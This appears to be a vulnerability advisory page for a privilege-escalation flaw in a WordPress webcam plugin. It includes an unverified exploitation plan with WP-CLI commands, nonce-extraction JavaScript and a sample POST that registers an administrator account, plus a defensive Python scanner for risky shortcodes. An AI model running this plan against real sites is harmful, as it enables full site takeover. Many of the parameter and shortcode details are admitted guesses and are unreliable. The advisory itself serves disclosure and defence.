CVE-2025-8899

Paid Videochat Turnkey Site – HTML5 PPV Live Webcams <= 7.3.20 - Authenticated (Author+) Privilege Escalation

Weakness: Improper Privilege Management
CVSS Score: 8.8
Severity: high
Patched in: 7.3.21
Time to patch: 1d

Description

The Paid Videochat Turnkey Site – HTML5 PPV Live Webcams plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 7.3.20. This is due to videowhisper_register_form() function not restricting user roles that can be set during registration. This makes it possible for authenticated attackers, with Author-level access and above, to create posts/pages with the registration form and administrator set as the role and subsequently use that form to register an administrator account. This can also be exploited by contributors, but is far less likely to be successful because an administrator would need to approve the form with the administrator role for the attack to be successful.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: <=7.3.20
Published: March 6, 2026
Last updated: March 7, 2026
Affected plugin: ppv-live-webcams

Source Code

WordPress.org SVN
Patched

Patched version not available.

Research Plan
Unverified


Exploitation Research Plan: CVE-2025-8899 - Privilege Escalation

1. Vulnerability Summary

The Paid Videochat Turnkey Site – HTML5 PPV Live Webcams plugin (<= 7.3.20) contains an improper privilege management vulnerability in the videowhisper_register_form() function. This function renders a registration form that determines the resulting user's role based on configuration (likely shortcode attributes or post metadata) without validating whether the user creating the configuration has the authority to assign high-level roles like administrator. An authenticated attacker with Author privileges can create a page with a registration form configured to assign the administrator role and then use that form to create a new admin account.

2. Attack Vector Analysis

  • Entry Point: A WordPress shortcode provided by the plugin, most likely [videowhisper_register_form].
  • Vulnerable Parameter: The role attribute within the shortcode or a related configuration parameter.
  • Authentication Level: Authenticated (Author or above). Authors can publish posts directly. Contributors can also attempt this, but their posts require admin approval, making the attack "less likely to be successful" as per the description.
  • Preconditions: The plugin must be active. The attacker must have permissions to create and publish posts/pages.

3. Code Flow (Inferred)

  1. Shortcode Registration: The plugin registers a shortcode (likely via add_shortcode('videowhisper_register_form', 'videowhisper_register_form')).
  2. Rendering: When a post containing the shortcode is viewed, videowhisper_register_form() executes. It parses attributes (e.g., role="administrator").
  3. Form Generation: The function renders an HTML <form> for user registration. It likely embeds the target role into a hidden input field or associates it with the post ID.
  4. Submission Handling: When the form is submitted (via POST to admin-ajax.php or the page itself), a handler (likely checking $_POST['action'] == 'videowhisper_register') processes the input.
  5. User Creation: The handler calls wp_insert_user() or wp_create_user(), using the role specified in the form/post configuration without verifying if that role assignment is permitted for the post author.

4. Nonce Acquisition Strategy

The registration form likely includes a WordPress nonce for security. Since we need to interact with the rendered form:

  1. Create the Page: Use WP-CLI to create a page with the malicious shortcode.
  2. Navigate: Use browser_navigate to visit the newly created page.
  3. Extract Nonce: Use browser_eval to extract the nonce from the form fields or localized JavaScript.

Inferred JS/HTML Identifiers:

  • Shortcode: [videowhisper_register_form role="administrator"] (inferred based on description).
  • Nonce Field: Look for name="_wpnonce" or name="videowhisper_nonce" inside the form.
  • Form Action: The form action attribute will indicate if it submits to admin-ajax.php or the current URL.

5. Exploitation Strategy

Step 1: Data Setup

Create an Author user to perform the attack.

wp user create attacker attacker@example.com --role=author --user_pass=password123

Step 2: Create Malicious Page

As the Author, create a page containing the registration shortcode with the administrator role.

wp post create --post_type=page --post_title="Register Admin" --post_status=publish --post_content='[videowhisper_register_form role="administrator"]' --user=attacker

Note: If role is not an attribute, it might be role_id="administrator" or configured via a block.

Step 3: Extract Form Details

Navigate to the page and find the registration form parameters.

  1. browser_navigate to the URL of the created page.
  2. browser_eval to find the form and its fields:
    () => {
        const form = document.querySelector('form');
        const inputs = Array.from(form.querySelectorAll('input')).map(i => ({name: i.name, value: i.value}));
        return { action: form.action, inputs };
    }
    

Step 4: Submit Registration

Send a POST request to the identified endpoint (usually the page URL or admin-ajax.php) to register the new administrator.

Payload Example (Inferred):

  • user_login: newadmin
  • user_email: newadmin@example.com
  • user_pass: StrongPassword123!
  • role: administrator (If passed in POST)
  • _wpnonce: [EXTRACTED_NONCE]
  • action: videowhisper_register (If using AJAX)

Request:

POST /wp-admin/admin-ajax.php (or page URL)
Content-Type: application/x-www-form-urlencoded

action=videowhisper_register&user_login=eviladmin&user_email=evil@example.com&user_pass=Password123!&role=administrator&_wpnonce=a1b2c3d4e5

6. Test Data Setup

  1. Plugin Installation: Ensure ppv-live-webcams version <= 7.3.20 is installed.
  2. Attacker User: Author user created via WP-CLI.
  3. Target Role: The string "administrator".

7. Expected Results

  • The registration form should render on the page created by the Author.
  • The POST request should return a success message (e.g., "Registration successful").
  • A new user eviladmin should be created in the WordPress database.
  • The user eviladmin should have the administrator role.

8. Verification Steps

After the exploit, use WP-CLI to verify the privilege escalation:

# Check if the user exists and what their role is
wp user list --role=administrator
wp user get eviladmin --field=roles

9. Alternative Approaches

  • Attribute Variations: If role="administrator" doesn't work, try variations like user_role, level, or group.
  • Block Editor: If the plugin uses Gutenberg blocks, the attributes are stored in JSON comments within post_content. Inspect the post_content of an existing registration page created by a real admin to see the format.
  • POST directly to Page: If the shortcode handles its own POST logic, the request should go to the page URL where the shortcode is placed, not admin-ajax.php.
  • Identify correct shortcode: If [videowhisper_register_form] is incorrect, use grep -r "add_shortcode" wp-content/plugins/ppv-live-webcams to find the exact registration shortcode name.

Research Findings
Static analysis — not yet PoC-verified

Summary

The plugin's registration form functionality fails to restrict the user roles that can be assigned through shortcode attributes or form parameters. This allows authenticated users with Author-level permissions to publish pages with registration forms configured to create new Administrator accounts, leading to full site takeover.
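
For site owners checking existing content, the sketch below is an added example (not code from the plugin or from this advisory) that scans exported post rows for registration shortcodes or blocks carrying a privileged role. It assumes the shortcode tag starts with `videowhisper`, checks every attribute because the attribute name is only inferred on this page, and uses constructed sample rows, including a hypothetical block name.

```python
import html
import json
import re

# Assumptions (not taken from the plugin's source): the tag prefix, and the set
# of roles a self-registration form should never be able to grant.
TAG_PREFIX = "videowhisper"
PRIVILEGED_ROLES = {"administrator", "editor"}

SHORTCODE_RE = re.compile(r"\[(" + TAG_PREFIX + r"\w*)\b([^\]]*)\]", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s\]]+))""")
BLOCK_RE = re.compile(
    r"<!--\s*wp:(\S*" + TAG_PREFIX + r"\S*)\s+(\{.*?\})\s*/?-->", re.I | re.S)


def privileged_attrs(content):
    """Yield (tag, attribute, role) for each privileged role set in content."""
    text = html.unescape(content)  # stored content may carry &quot; for quotes
    for tag, raw in SHORTCODE_RE.findall(text):
        for name, dq, sq, bare in ATTR_RE.findall(raw):
            value = (dq or sq or bare).strip().lower()
            if value in PRIVILEGED_ROLES:
                yield tag, name, value
    for block, raw in BLOCK_RE.findall(text):  # block attributes are JSON
        try:
            attrs = json.loads(raw)
        except ValueError:
            continue  # malformed block comment, nothing to inspect
        for name, value in attrs.items():
            role = str(value).strip().lower()
            if role in PRIVILEGED_ROLES:
                yield block, name, role


def scan_posts(rows):
    """rows: (ID, post_author, post_status, post_content) tuples.
    A 'publish' status means the form is live; 'pending' awaits approval."""
    return [(pid, author, status, tag, name, role)
            for pid, author, status, content in rows
            for tag, name, role in privileged_attrs(content)]


# Constructed sample rows, shaped like an export of wp_posts.
SAMPLE_POSTS = [
    (10, 7, "publish", '[videowhisper_register_form role="administrator"]'),
    (11, 9, "pending", "<p>Join</p>[videowhisper_register_form user_role=&quot;Administrator&quot;]"),
    (12, 1, "publish", '[videowhisper_register_form role="subscriber"]'),
    (13, 7, "publish", '<!-- wp:videowhisper/register {"role":"administrator"} /-->'),
]

if __name__ == "__main__":
    for finding in scan_posts(SAMPLE_POSTS):
        print(finding)
```

Any finding on a post whose author is not an administrator is worth reviewing together with the current list of administrator accounts; the fix itself is updating to 7.3.21.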

Exploit Outline

  1. Authenticate as an Author or any user with the 'publish_posts' capability.
  2. Create a new page or post containing the registration shortcode with the role attribute set to administrator (e.g., [videowhisper_register_form role="administrator"]).
  3. Publish the page to make the form active and accessible on the frontend.
  4. Navigate to the newly created page's URL and complete the registration form with a new set of credentials.
  5. Log in with the newly created credentials to access the WordPress dashboard with full Administrator privileges.
